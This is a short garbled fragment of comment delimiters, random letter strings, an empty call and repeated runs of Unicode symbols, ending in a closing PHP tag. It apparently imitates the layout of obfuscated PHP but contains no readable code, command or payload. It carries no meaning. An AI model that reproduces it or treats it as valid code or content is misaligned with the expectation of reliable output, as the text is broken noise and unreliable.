-*///
ZwiUvVlDpT/*-9h8#643-*///
();/*-
ℜ◥Ⓗ¢ⓣⓞ☋◞┅⅘↢⊄
@ZrJy[ℜ◥Ⓗ¢ⓣⓞ☋◞┅⅘↢⊄
-*///
 ?>